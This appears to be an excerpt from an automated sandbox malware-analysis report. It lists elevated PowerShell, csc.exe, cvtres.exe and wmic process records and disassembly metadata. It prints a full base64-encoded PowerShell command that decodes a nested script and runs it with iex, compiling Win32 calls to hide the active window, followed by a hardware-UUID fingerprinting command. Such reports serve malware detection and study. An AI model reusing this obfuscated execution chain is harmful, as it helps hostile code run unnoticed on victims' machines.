                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:3
                                                                                                                                                  Start time:02:59:10
                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAUQAwAEsASQBDAEEAZwBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGwATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAEoARwBoAFgAYgBtAFEAcwBJAEQAQQBwAEQAUQBwADkARABRAG8AawBZADMAVgB5AGMAbQBWAHUAZABGAGQAcABiAG0AUgB2AGQAMQBSAHAAZABHAHgAbABJAEQAMABnAFIAMgBWADAAUQBXAE4AMABhAFgAWgBsAFYAMgBsAHUAWgBHADkAMwBWAEcAbAAwAGIARwBVAE4AQwBrAGgAcABaAEcAVgBCAFkAMwBSAHAAZABtAFYAWABhAFcANQBrAGIAMwBjAE4AQwBnAD0APQAiAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuACkALgBTAGMAcgBpAHAAdAApACkAIAB8ACAAaQBlAHgA
                                                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:5
                                                                                                                                                  Start time:02:59:24
                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.cmdline"
                                                                                                                                                  Imagebase:0x7ff7b0010000
                                                                                                                                                  File size:2'759'232 bytes
                                                                                                                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:moderate
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:6
                                                                                                                                                  Start time:02:59:24
                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD9CB.tmp" "c:\Users\user\AppData\Local\Temp\at4aznwk\CSC4E83F948CA91455DAC7F3163ADDBB8D.TMP"
                                                                                                                                                  Imagebase:0x7ff7f03f0000
                                                                                                                                                  File size:52'744 bytes
                                                                                                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:7
                                                                                                                                                  Start time:02:59:26
                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAUQAwAEsASQBDAEEAZwBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGwATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAEoARwBoAFgAYgBtAFEAcwBJAEQAQQBwAEQAUQBwADkARABRAG8AawBZADMAVgB5AGMAbQBWAHUAZABGAGQAcABiAG0AUgB2AGQAMQBSAHAAZABHAHgAbABJAEQAMABnAFIAMgBWADAAUQBXAE4AMABhAFgAWgBsAFYAMgBsAHUAWgBHADkAMwBWAEcAbAAwAGIARwBVAE4AQwBrAGgAcABaAEcAVgBCAFkAMwBSAHAAZABtAFYAWABhAFcANQBrAGIAMwBjAE4AQwBnAD0APQAiAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuACkALgBTAGMAcgBpAHAAdAApACkAIAB8ACAAaQBlAHgA
                                                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:8
                                                                                                                                                  Start time:02:59:27
                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.cmdline"
                                                                                                                                                  Imagebase:0x7ff7b0010000
                                                                                                                                                  File size:2'759'232 bytes
                                                                                                                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:moderate
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:9
                                                                                                                                                  Start time:02:59:27
                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE63E.tmp" "c:\Users\user\AppData\Local\Temp\f2b3v2t5\CSCCC5958D27FB74F62AE119AE083742021.TMP"
                                                                                                                                                  Imagebase:0x7ff7f03f0000
                                                                                                                                                  File size:52'744 bytes
                                                                                                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:10
                                                                                                                                                  Start time:02:59:36
                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"wmic" csproduct get uuid /value
                                                                                                                                                  Imagebase:0x7ff77a3b0000
                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Disassembly

                                                                                                                                                  Reset < >

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:3.3%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                    Total number of Nodes:3
                                                                                                                                                    Total number of Limit Nodes:0
                                                                                                                                                    execution_graph 7934 7ff848e8b124 7935 7ff848e8b12d LoadLibraryExW 7934->7935 7937 7ff848e8b1dd 7935->7937

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 00007FF848E859C4 Relevance: .5, Instructions: 482COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 27 7ff848e859c4-7ff848e85a07 call 7ff848e84008 30 7ff848e85a09-7ff848e85a0f 27->30 31 7ff848e85a11-7ff848e85a21 27->31 32 7ff848e85a23-7ff848e85a27 30->32 31->32 33 7ff848e85a9b-7ff848e85aa6 32->33 34 7ff848e85a29 32->34 35 7ff848e85aac 33->35 36 7ff848e85d23-7ff848e85d32 33->36 34->36 37 7ff848e85a2e-7ff848e85a55 call 7ff848e85800 35->37 39 7ff848e85d5e-7ff848e85db2 call 7ff848e84eb0 call 7ff848e84030 36->39 44 7ff848e85aae-7ff848e85ab6 37->44 45 7ff848e85a57-7ff848e85a61 37->45 78 7ff848e85db9-7ff848e85dc6 39->78 46 7ff848e85abb-7ff848e85ac5 44->46 47 7ff848e85ab8 44->47 49 7ff848e85a67-7ff848e85a7c 45->49 50 7ff848e85cc0-7ff848e85cd0 45->50 53 7ff848e85ac7-7ff848e85ad0 46->53 54 7ff848e85ad2-7ff848e85ad6 46->54 47->46 51 7ff848e85cd7-7ff848e85ce2 49->51 52 7ff848e85a82 49->52 50->51 56 7ff848e85ce8-7ff848e85d1c call 7ff848e84eb8 call 7ff848e84030 51->56 58 7ff848e85a87-7ff848e85a9a 51->58 52->56 57 7ff848e85adb-7ff848e85ade 53->57 54->57 56->36 60 7ff848e85b95-7ff848e85b9b 57->60 61 7ff848e85ae4-7ff848e85af1 57->61 60->39 67 7ff848e85ba1 60->67 63 7ff848e85af7-7ff848e85b02 61->63 64 7ff848e85ba6-7ff848e85bb5 61->64 68 7ff848e85b04-7ff848e85b0b 63->68 64->68 67->61 70 7ff848e85bba-7ff848e85bc5 68->70 71 7ff848e85b11-7ff848e85b14 call 7ff848e83f98 68->71 75 7ff848e85bc7 70->75 76 7ff848e85b50-7ff848e85b53 70->76 81 7ff848e85b19-7ff848e85b35 call 7ff848e85800 71->81 75->71 79 7ff848e85bfd-7ff848e85c21 call 7ff848e83f90 call 7ff848e85650 76->79 80 7ff848e85b59-7ff848e85b7b 76->80 88 7ff848e85e14-7ff848e85e7d call 7ff848e84eb8 call 7ff848e84030 78->88 102 7ff848e85c26-7ff848e85c5a call 7ff848e85800 79->102 80->79 98 7ff848e85b81-7ff848e85b90 call 7ff848e85800 80->98 90 7ff848e85bcc-7ff848e85bde 81->90 91 7ff848e85b3b-7ff848e85b3f 81->91 123 7ff848e85e7f-7ff848e85e86 88->123 124 7ff848e85e87-7ff848e85eb5 88->124 95 7ff848e85b41-7ff848e85b45 90->95 91->95 99 7ff848e85b4b 95->99 100 7ff848e85be3-7ff848e85bee 95->100 98->45 99->78 100->78 104 7ff848e85bf4-7ff848e85bf7 100->104 112 7ff848e85c5c-7ff848e85c65 102->112 113 7ff848e85c67-7ff848e85c6b 102->113 104->79 104->80 114 7ff848e85c70-7ff848e85c73 112->114 113->114 115 7ff848e85c75-7ff848e85c7b 114->115 116 7ff848e85c81-7ff848e85c8b 114->116 115->45 115->116 118 7ff848e85c8d-7ff848e85c96 116->118 119 7ff848e85c98-7ff848e85c9c 116->119 120 7ff848e85ca1-7ff848e85ca4 118->120 119->120 120->88 122 7ff848e85caa-7ff848e85cb5 120->122 122->88 126 7ff848e85cbb 122->126 123->124 127 7ff848e85eb7-7ff848e85ed5 124->127 128 7ff848e85ef2-7ff848e85f06 124->128 126->37 129 7ff848e85f07-7ff848e85f53 call 7ff848e85800 127->129 130 7ff848e85ed7-7ff848e85ef1 127->130 134 7ff848e85f5d-7ff848e85f65 129->134 135 7ff848e85f55-7ff848e85f5c 129->135 136 7ff848e85f6a-7ff848e85f8a call 7ff848e83fe8 134->136 137 7ff848e85f67 134->137 140 7ff848e85f8c-7ff848e85f8f call 7ff848e83fb0 136->140 141 7ff848e85f9b-7ff848e85fa9 call 7ff848e83fa8 136->141 137->136 145 7ff848e85f94-7ff848e85f9a 140->145
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000003.00000002.2266698059.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ff848e80000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d9b51a38a6e9c3ede1644f7aa4f7b7f39345c78dff2ade02758a3b9b94b1153c
                                                                                                                                                    • Instruction ID: 9b32d0fcccaac0d57570968295d6e2c841440d83d9f73164dc61e6cd0ecef182
                                                                                                                                                    • Opcode Fuzzy Hash: d9b51a38a6e9c3ede1644f7aa4f7b7f39345c78dff2ade02758a3b9b94b1153c
                                                                                                                                                    • Instruction Fuzzy Hash: D7E10331E1C65A8FE768AB28848527E77C1FF45390F94117DE88EC71D2DF38A842874A
                                                                                                                                                    Function 00007FF848E8B124 Relevance: 1.6, APIs: 1, Instructions: 117libraryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000003.00000002.2266698059.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ff848e80000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                    • Opcode ID: 1f5799455dd40015271e27f8d316fa20a1d4739346ba051f9ee67e8ca5beac3e
                                                                                                                                                    • Instruction ID: ead4bf781516eb34a88a1589ed5d537b534d0cb145563a64bdfd2019768ab78f
                                                                                                                                                    • Opcode Fuzzy Hash: 1f5799455dd40015271e27f8d316fa20a1d4739346ba051f9ee67e8ca5beac3e
                                                                                                                                                    • Instruction Fuzzy Hash: 9231C43190CA5C9FDB59DF689849AE9BBE0FF55321F04822FD009C3252DB74A855CB91
                                                                                                                                                    Function 00007FF848F553B5 Relevance: .4, Instructions: 441COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 146 7ff848f553b5-7ff848f55444 150 7ff848f556ac-7ff848f5576b 146->150 151 7ff848f5544a-7ff848f55454 146->151 152 7ff848f5546d-7ff848f55472 151->152 153 7ff848f55456-7ff848f55463 151->153 156 7ff848f55478-7ff848f5547b 152->156 157 7ff848f55650-7ff848f5565a 152->157 153->152 162 7ff848f55465-7ff848f5546b 153->162 158 7ff848f5547d-7ff848f55490 156->158 159 7ff848f55492 156->159 160 7ff848f5565c-7ff848f55668 157->160 161 7ff848f55669-7ff848f556a9 157->161 164 7ff848f55494-7ff848f55496 158->164 159->164 161->150 162->152 164->157 167 7ff848f5549c-7ff848f554d0 164->167 179 7ff848f554e7 167->179 180 7ff848f554d2-7ff848f554e5 167->180 183 7ff848f554e9-7ff848f554eb 179->183 180->183 183->157 185 7ff848f554f1-7ff848f554f9 183->185 185->150 186 7ff848f554ff-7ff848f55509 185->186 187 7ff848f5550b-7ff848f55523 186->187 188 7ff848f55525-7ff848f55535 186->188 187->188 188->157 192 7ff848f5553b-7ff848f5556c 188->192 192->157 197 7ff848f55572-7ff848f5559e 192->197 201 7ff848f555c9-7ff848f555cd 197->201 202 7ff848f555a0-7ff848f555c6 197->202 201->157 203 7ff848f555d3-7ff848f555db 201->203 202->201 205 7ff848f555dd-7ff848f555e7 203->205 206 7ff848f555eb 203->206 207 7ff848f555e9 205->207 208 7ff848f55607-7ff848f55636 205->208 210 7ff848f555f0-7ff848f55605 206->210 207->210 214 7ff848f5563d-7ff848f5564f 208->214 210->208
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000003.00000002.2267376018.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ff848f50000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2edfd4e44dba5fc345de778e0572c1e0475178b0ff07ad2de80ab305d80081f4
                                                                                                                                                    • Instruction ID: fd2cc32bb0ae23915dc4818d90b9442a997a22d6ebc6d4c1caa913d297c597af
                                                                                                                                                    • Opcode Fuzzy Hash: 2edfd4e44dba5fc345de778e0572c1e0475178b0ff07ad2de80ab305d80081f4
                                                                                                                                                    • Instruction Fuzzy Hash: 9FD16731E1EAC95FE795AB2898555B6BBE1FF1A3A4F0800FAD04DC70D3EA18AC05C355
                                                                                                                                                    Function 00007FF848F52AAD Relevance: .3, Instructions: 273COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 307 7ff848f52aad-7ff848f52ade 310 7ff848f52ae0-7ff848f52aea 307->310 311 7ff848f52b53-7ff848f52b94 307->311 312 7ff848f52aec-7ff848f52afa 310->312 313 7ff848f52afb-7ff848f52b50 310->313 321 7ff848f52b96-7ff848f52ba6 311->321 322 7ff848f52ba7 311->322 313->311 321->322 323 7ff848f52ba9-7ff848f52be0 322->323 324 7ff848f52be3-7ff848f52c34 322->324 323->324 332 7ff848f52c3b-7ff848f52d0b 324->332
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000003.00000002.2267376018.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ff848f50000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
